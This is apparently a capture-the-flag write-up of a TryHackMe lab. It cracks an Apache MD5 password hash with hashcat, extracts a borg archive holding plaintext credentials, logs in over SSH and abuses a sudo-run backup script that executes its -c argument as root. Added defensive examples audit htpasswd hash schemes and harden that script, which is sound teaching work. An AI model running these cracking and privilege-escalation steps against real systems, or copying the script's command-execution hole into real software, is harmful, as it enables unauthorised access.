Before we crack the hash, let's save it in a hash.txt file and look up the hashcat hash-mode for MD5(APR), which is 1600.
Now we can use hashcat to crack the hash.
$ hashcat -a 0 -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz, 1587/3239 MB (512 MB allocatable), 3MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Sun Nov 12 15:16:11 2023 (3 secs)
Time.Estimated...: Sun Nov 12 15:16:14 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12073 H/s (144115188076.33ms) @ Accel:256 Loops:15 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39168/14344385 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38400/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:990-1000
Candidate.Engine.: Device Generator
Candidates.#1....: jonah1 -> lynnlynn
Hardware.Mon.#1..: Util: 68%
Started: Sun Nov 12 15:15:28 2023
Stopped: Sun Nov 12 15:16:16 2023
Now we know both the username and the password.
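The $apr1$ digest above fell to a plain CPU dictionary run in three seconds at roughly 12 kH/s, after trying only 0.27% of rockyou.txt. The defender's takeaway is that Apache's MD5 scheme is cheap to guess and that bcrypt (htpasswd -B) is the scheme to use instead. The following script is an added example, not part of the original write-up: it audits an htpasswd file and flags every entry by hash scheme. The function names are mine, and the sample file it writes is constructed: the $apr1$ line is the hash cracked above, the bcrypt line is a placeholder carrying only the prefix of a real hash, and the {SHA} line is the SHA-1 of an empty password.

```shell
#!/bin/sh
# Added example: audit an Apache htpasswd file and flag hash schemes that a
# CPU can brute-force quickly. Scheme detection keys off the prefixes that
# Apache's htpasswd tool writes; nothing here cracks anything.

# audit_htpasswd FILE
# Prints "<user> <scheme> <verdict>" per entry and returns 1 if any entry is
# weak, 0 if every entry uses bcrypt.
audit_htpasswd() {
    file="$1"
    weak=0
    # The loop reads from a redirect, not a pipe, so $weak survives it.
    while IFS=: read -r user hash _; do
        # Skip blank lines and comments.
        case "$user" in ''|'#'*) continue ;; esac
        case "$hash" in
            '$2y$'*|'$2a$'*|'$2b$'*) scheme=bcrypt;  verdict=ok ;;   # htpasswd -B
            '$apr1$'*)               scheme=md5apr1; verdict=WEAK ;; # htpasswd -m
            '{SHA}'*)                scheme=sha1;    verdict=WEAK ;; # htpasswd -s
            *)
                if [ "${#hash}" -eq 13 ]; then
                    scheme=crypt; verdict=WEAK      # htpasswd -d, 8-char limit
                else
                    scheme=plain; verdict=WEAK      # htpasswd -p or unknown
                fi ;;
        esac
        [ "$verdict" = ok ] || weak=1
        printf '%s %s %s\n' "$user" "$scheme" "$verdict"
    done < "$file"
    return "$weak"
}

# write_sample_htpasswd FILE: constructed entries for a stand-alone run.
# The $apr1$ hash is the one cracked in the write-up; the bcrypt value is a
# placeholder with only the prefix of a real hash; the {SHA} value is the
# SHA-1 of the empty string.
write_sample_htpasswd() {
    cat > "$1" <<'EOF'
# constructed sample htpasswd
webadmin:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
legacy:{SHA}2jmj7l5rSw0yVb/vlWAYkK/YBwk=
modern:$2y$10$CONSTRUCTED.placeholder.not.a.real.bcrypt.hash000000
EOF
}

# Entry point: "--demo" audits the constructed sample, any other argument is
# treated as an htpasswd file, no argument does nothing (so the functions can
# be sourced).
case "${1:-}" in
    '') ;;
    --demo)
        tmp=$(mktemp)
        write_sample_htpasswd "$tmp"
        audit_htpasswd "$tmp"
        status=$?
        rm -f "$tmp"
        exit "$status" ;;
    *) audit_htpasswd "$1" ;;
esac
```

Run it as `sh audit_htpasswd.sh /etc/apache2/.htpasswd` (or `--demo` for the sample); a non-zero exit means at least one entry should be regenerated with `htpasswd -B`. The classifier deliberately treats anything it does not recognise as weak rather than silently passing it.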
We are all set to extract Alex's filesystem from the borg archive. We can use the borg utility to do this.
$ borg extract /home/kunal/tryhackme/cyborg/home/field/dev/final_archive::music_archive
Enter passphrase for key /home/kunal/tryhackme/cyborg/home/field/dev/final_archive:
If we then go to the home/alex/Documents directory, we see a note.txt file.
Let's cat out the file.
$ cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
Let's try to ssh into the machine using the above credentials.
$ ssh alex@10.10.228.18
The authenticity of host '10.10.228.18 (10.10.228.18)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.228.18' (ED25519) to the list of known hosts.
alex@10.10.228.18's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$
We have successfully logged on to Alex's machine.
Let's look around to see what we can find.
$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
The user.txt file seems interesting. Let's check its contents.
In order to find the root flag we need to become the root user.
Using the sudo -l command, we can see what sudo permissions the alex user has.
$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We can see that the alex user may run the /etc/mp3backups/backup.sh script as root, without supplying a password.
backup.sh

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"

# Parse options: -c <command> stores its argument in $command.
while getopts c: flag
do
    case "${flag}" in
        c) command=${OPTARG};;
    esac
done

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

# Runs whatever was passed with -c (as root, under sudo) and prints its output.
cmd=$($command)
echo $cmd
Looking at the while loop, we can see that the script accepts a user-supplied command through the -c option and stores it in the command variable; the last two lines then execute it (cmd=$($command)) and print the result. Since the script runs as root via sudo, so does that command.
Using this knowledge, we can set the suid bit on the /bin/bash file.
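For the defensive side, here is a hardened rewrite of the backup script as an added example, not the room's backup.sh. It keeps the same job (archive the MP3s under /home/alex/Music into /etc/mp3backups as root under the same NOPASSWD sudoers entry) but removes the -c option and the cmd=$($command) line, so nothing from the command line is ever executed; it also drops the sudo calls inside the script (under that sudoers entry it is already root), the unused find / ... | tee list, and the unquoted expansions. The function name, the $0 entry-point check and the test files are my assumptions.

```shell
#!/bin/sh
# Added example: hardened replacement for the backup script in the write-up.
# Assumes it is installed as /etc/mp3backups/backup.sh and run as root through
# the existing sudoers rule. It takes no options, so there is nothing for an
# unprivileged caller to pass through to a shell.
set -eu

DEST="/etc/mp3backups"
MUSIC_DIR="/home/alex/Music"

# backup_mp3s OUT_DIR SRC_DIR
# Archives every regular *.mp3 directly under SRC_DIR into
# OUT_DIR/<host>-scheduled.tgz, readable only by the owner (root when run via
# sudo), and prints the archive path. Returns 1 if there is nothing to back up.
backup_mp3s() {
    out_dir="$1"
    src="$2"
    host=$(uname -n | cut -d. -f1)      # same result as hostname -s
    archive="$out_dir/$host-scheduled.tgz"

    # Collect the file list in the positional parameters so that names with
    # spaces survive without word splitting or globbing.
    set --
    for f in "$src"/*.mp3; do
        [ -f "$f" ] && set -- "$@" "$f"
    done
    if [ "$#" -eq 0 ]; then
        echo "backup: no .mp3 files in $src" >&2
        return 1
    fi

    umask 077
    tar czf "$archive" "$@"
    printf '%s\n' "$archive"
}

# Entry point: only when invoked as the installed script (basename backup.sh),
# so the function above can also be sourced for testing. Any argument is an
# error, never a command.
case "${0##*/}" in
    backup.sh)
        if [ "$#" -gt 0 ]; then
            echo "usage: $0 (takes no arguments)" >&2
            exit 2
        fi
        backup_mp3s "$DEST" "$MUSIC_DIR"
        ;;
esac
```

Even with the script fixed, a sudoers rule should point at a root-owned, non-writable file (the original rule is only as safe as the permissions on /etc/mp3backups/backup.sh itself), and the script should be reviewed for any place where argv or environment reaches `eval`, `$(...)`, or an unquoted command.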